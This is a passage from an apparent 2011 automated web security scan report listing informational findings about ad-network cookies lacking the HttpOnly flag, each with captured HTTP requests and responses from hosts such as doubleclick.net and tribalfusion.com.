Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:50:07 GMT
Content-Length: 8096
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...

14.89. http://a.intentmedia.net/adServer/beacons

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.intentmedia.net
Path:   /adServer/beacons

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adServer/beacons?entity_id=45&site=EXPEDIA&cache_buster=1317600641956&product_category=hotels&is_details_page=N HTTP/1.1
Host: a.intentmedia.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=2588797;type=nausc826;cat=nauss008;ord=2134735815;u=ccf4a420af8b480f8413efb42e880287;u1=Hotel;u2=178239;u4=20111004%7C20111007;u6=1;u7=1%7C0;u9=;u11=0;u12=;u13=4215%7C15861%7C23415%7C1680030%7C2800816;u14=429.0%7C339.15%7C289.0%7C432.33%7C308.54;u16=USD
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: intentmedia_user_id=27f4839b-213a-4016-9212-fcfa87390629

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Mon, 03 Oct 2011 00:12:12 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI COM NAV INT"
Server: Jetty(6.1.17)
Set-Cookie: intentmedia_user_id=27f4839b-213a-4016-9212-fcfa87390629;Path=/;Expires=Wed, 02-Oct-13 00:12:12 GMT
Set-Cookie: a6="WyUB7GQUJJdFm%2FT%2B7nUbOmv6Yc16PxIts4eXtTMWx5kPcK1kQ%2F2WkbOfzMMQg0NRXGj44wZDYMi2N0QXyjAeHrolfTf2FCxQm4sh2nOGVK2MEGOoSxsFasziQqJbYof3ozi53bs8%2FBwDexviMpe%2BO5CVTix8R7m2FnR%2BYphnrgshVpmyFe2A1I%2BEdR0b9EgJ5yIozncTSkQ%3D";Path=/;Expires=Wed, 02-Oct-13 00:12:12 GMT
Via: 1.1 a.intentmedia.net
Content-Length: 0
Connection: keep-alive


14.90. http://a.intentmedia.net/adServer/impressions

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.intentmedia.net
Path:   /adServer/impressions

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adServer/impressions?publisher_session_id=74C1C04EA1B1607D7CD2E1313B9B2779.p0617&cache_buster=1317600538540&product_category=hotels&site=TRAVELOCITY&time_zone_offset=300&submarket_id=MA134-0100&rooms=1&travelers=1&ad_unit_id=5&hotel_property_ids=4810_114273_46356_10677_601_41209_48167_28920_4643_25625_12989_1013_13360_64654_44777_9773_11430_10448_46065_32162_20077_1228_12056_34410_9074_202264_620_914_7745_27993_79419_50883_102143_12018_9817_2841_13114_2004_70926_1322_58534_774_12062_48559_26931_2738_15077_44999_52173_3_1747_20114_26186_65482_52374_22259_56985_19411_22479_32159_85128_16231_2844_18685_64276_57481_2837_1213_28041_11122_34000_35409_75432_80723_34758_24713_35992_34361_49791_54902_31216_7256_9239_50684_28588_16565_25026_33473_16477_35131_35054_24709_23560_22574_26118_138019_44277_4680_309_45625_39186_30198_44375_85127_63829_7921_31749_8178_42595_20007_119214_119432_119478_40415_103982_10487_10678_14412_21745_23568_25299_26117_30034_35838_41236_4470_49886_56521_59519_62421_64032_8867_10158_10348_13_25492_27425_54939_6073_18969_119779_119627_44593_62214_8046_33150_111060_64750_144426_138764_139993_121079_123761_124226_141217_45783_60995_80644 HTTP/1.1
Host: a.intentmedia.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Date: Mon, 03 Oct 2011 00:09:04 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI COM NAV INT"
Server: Jetty(6.1.17)
Set-Cookie: intentmedia_user_id=27f4839b-213a-4016-9212-fcfa87390629;Path=/;Expires=Wed, 02-Oct-13 00:09:04 GMT
Via: 1.1 a.intentmedia.net
Content-Length: 259
Connection: keep-alive

try{if (IntentMedia) {IntentMedia.PUBLISHER_REPORTS=false;IntentMedia.MONTHLY_ASAP_BUDGETS=false;IntentMedia.SUPPRESS_CHEAPTICKETS_GLOBAL=true;IntentMedia.SSN_ORBITZ_GLOBAL_SHOW_REVIEWS_TEST=false;Int
...[SNIP]...

14.91. http://a.tribalfusion.com/displayAd.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /displayAd.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /displayAd.js?dver=0.4&th=41533529378 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 153
X-Reuse-Index: 1
Date: Mon, 03 Oct 2011 00:15:06 GMT
Last-Modified: Sat, 20 Aug 2011 07:25:15 GMT
Expires: Sun, 01 Jan 2012 00:15:06 GMT
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Thu, 30-Sep-2021 00:15:06 GMT;
Cache-Control: private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 247
Connection: keep-alive

var e9Manager;
var e9;

if (e9 !== undefined)
{
if (e9.displayAdFlag !== undefined)
{
if (e9.displayAdFlag === true)
    e9.displayAd();
}
else
e9Manager.displayAdFromE9(e9)
...[SNIP]...

14.92. http://a.tribalfusion.com/i.cid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /i.cid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i.cid?c=395973&ev=1&page=Samplehomepage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 206
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Wed, 29-Sep-2021 23:58:12 GMT;
Content-Type: text/html
Location: /z/i.cid?c=395973&ev=1&page=Samplehomepage
Content-Length: 36
Connection: keep-alive

<h1>Error 302 Moved Temporarily</h1>

14.93. http://a.tribalfusion.com/j.ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=audienceselectpublishers&adSpace=audienceselect&tagKey=3930898683&th=41533529378&tKey=undefined&size=1x1&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fads.pubmatic.com%2FAdServer%2Fjs%2Fsyncuppixels.html%3Fp%3D26071%26s%3D26072&f=2&p=759881&a=1&rnd=755916 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Thu, 30-Sep-2021 00:13:42 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 435
Expires: 0
Connection: keep-alive

document.write('<script type="text/javascript">\r\n(function() {\r\n var tfimg1853089121 = new Image();\r\n tfimg1853089121.src = "http://d7.zedo.com/img/bh.gif?n=826&g=20&a=0&s=1&l=1&t=e&f=1&e=1";\
...[SNIP]...

14.94. http://a.tribalfusion.com/z/i.cid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /z/i.cid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /z/i.cid?c=395973&ev=1&page=Samplehomepage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 307
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Wed, 29-Sep-2021 23:58:28 GMT;
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,........@..D..;

14.95. http://ad.doubleclick.net/ad/N270.N270.EMEA_StratDev/B3867719.15

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N270.N270.EMEA_StratDev/B3867719.15

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/N270.N270.EMEA_StratDev/B3867719.15;u=pid=%pid!;,aid=%eaid!;,cid=%ecid!;;sz=1x1;ord=9364091? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://s0.2mdn.net/3268620/PID_1701515_parent_virgin_728.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Mon, 03 Oct 2011 00:39:59 GMT
Location: http://s0.2mdn.net/viewad/2195126/4-1.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: id=cadfdd83c0000d7||t=1317602399|et=730|cs=002213fd48bae36ca9fa1ef88a; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:39:59 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:39:59 GMT
Server: GFE/2.0
Content-Type: text/html


14.96. http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6010.456584.XAXIS.COM/B5752701.15

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/N6010.456584.XAXIS.COM/B5752701.15;sz=728x90;click=http://ib.adnxs.com/click?znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEDAQUCAQQAAAAAHyfnFwAAAAA./cnd=!sAQDJgiylwcQsrMkGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D;ord=1317599426? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAHifUFwAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7472
Set-Cookie: id=ca5b4d83c000017||t=1317599554|et=730|cs=002213fd4884e3bed7d9e725fe; path=/; domain=.doubleclick.net; expires=Tue, 01 Oct 2013 23:52:34 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 01 Oct 2011 23:52:34 GMT
Date: Sun, 02 Oct 2011 23:52:34 GMT
Expires: Sun, 02 Oct 2011 23:52:34 GMT
Cache-Control: private

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...

14.97. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.28

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6054.Invitemedia.com/B5912738.28

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/N6054.Invitemedia.com/B5912738.28;sz=300x250;pc=[TPAS_ID];click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwdjEsOgzAMBa.CvCYS8Qe_cJvQpCvUXVdV747NyjPS8_xIhI6lQWtbFxIOgZsywmoIYb7Awl5aNxQ9ey_gsZWJOcYb2qcb5WuO3XjztOxk0OLK_tQ08PO9rsA9sJqK._8GBj4bwg--&redirectURL=;ord=8ec82327-9a58-4baa-82d0-e8eddf84ae75? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7661
Set-Cookie: id=c28c1d83c000039||t=1317600006|et=730|cs=002213fd48e65c670a029fff3e; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:00:06 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:00:06 GMT
Date: Mon, 03 Oct 2011 00:00:06 GMT
Expires: Mon, 03 Oct 2011 00:00:06 GMT
Cache-Control: private

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

14.98. http://ad.doubleclick.net/adj/N3285.advertisingcom/B2343920.49

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3285.advertisingcom/B2343920.49

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/N3285.advertisingcom/B2343920.49;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000812164/mnum=0000915323/cstr=23819479=_4e88fd24,7015322258,812164%5E915323%5E1184%5E0,1_/xsxdata=$xsxdata/bnum=23819479/optn=64?trg=;ord=7015322258? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 4435
Set-Cookie: id=c15cfd83c000083||t=1317600590|et=730|cs=002213fd480e0d8c5cbf724fda; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:09:50 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:09:50 GMT
Date: Mon, 03 Oct 2011 00:09:50 GMT
Expires: Mon, 03 Oct 2011 00:09:50 GMT
Cache-Control: private

document.write('<!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n<script src=\"http://s0.2mdn.net/879366/
...[SNIP]...

14.99. http://ad.doubleclick.net/adj/N4359.advertising.comOX2601/B5797640.2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4359.advertising.comOX2601/B5797640.2

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/N4359.advertising.comOX2601/B5797640.2;sz=160x600;click=http://r1-ads.ace.advertising.com/click/site=0000812162/mnum=0001072156/cstr=78334226=_4e88fd23,1577287805,812162%5E1072156%5E1184%5E0,1_/xsxdata=$XSXDATA/bnum=78334226/optn=64?trg=;ord=1577287805? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 8491
Set-Cookie: id=ce2ced83c000015||t=1317600592|et=730|cs=002213fd48e3531570c028be26; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:09:52 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:09:52 GMT
Date: Mon, 03 Oct 2011 00:09:52 GMT
Expires: Mon, 03 Oct 2011 00:09:52 GMT
Cache-Control: private

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Sep 16 16:30:33 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...

14.100. http://ad.doubleclick.net/adj/N4610.153021.INTERCLICKNETWORK/B5581164.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4610.153021.INTERCLICKNETWORK/B5581164.6

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/N4610.153021.INTERCLICKNETWORK/B5581164.6;sz=160x600;click=http://a1.interclick.com/icaid/194896/tid/bc07e8b0-ee36-425c-ab65-77ee7d5dd2f6/click.ic?;ord=634531823360070511? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5952
Set-Cookie: id=cc4c0d83c0000c2||t=1317600005|et=730|cs=002213fd48de979b12208ed0a7; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:00:05 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:00:05 GMT
Date: Mon, 03 Oct 2011 00:00:05 GMT
Expires: Mon, 03 Oct 2011 00:00:05 GMT
Cache-Control: private

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Sep 07 14:26:44 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...

14.101. http://ad.doubleclick.net/adj/gna.en/level2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/gna.en/level2

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/gna.en/level2;tile=1;sz=728x90;ord=940345?area=2l&pos=1&league=epl&ord=940345 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 463
Set-Cookie: id=c2dc0d83c00000a||t=1317599968|et=730|cs=002213fd481295e253bf9da118; path=/; domain=.doubleclick.net; expires=Tue, 01 Oct 2013 23:59:28 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 01 Oct 2011 23:59:28 GMT
Date: Sun, 02 Oct 2011 23:59:28 GMT
Expires: Sun, 02 Oct 2011 23:59:28 GMT
Cache-Control: private

document.write('<iframe id=\'a61a57b3\' name=\'a61a57b3\' src=\'http://d.tradex.openx.com/afr.php?zoneid=6393&amp;cb=INSERT_RANDOM_NUMBER_HERE\' frameborder=\'0\' scrolling=\'no\' width=\'728\' height
...[SNIP]...

14.102. http://ad.doubleclick.net/clk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

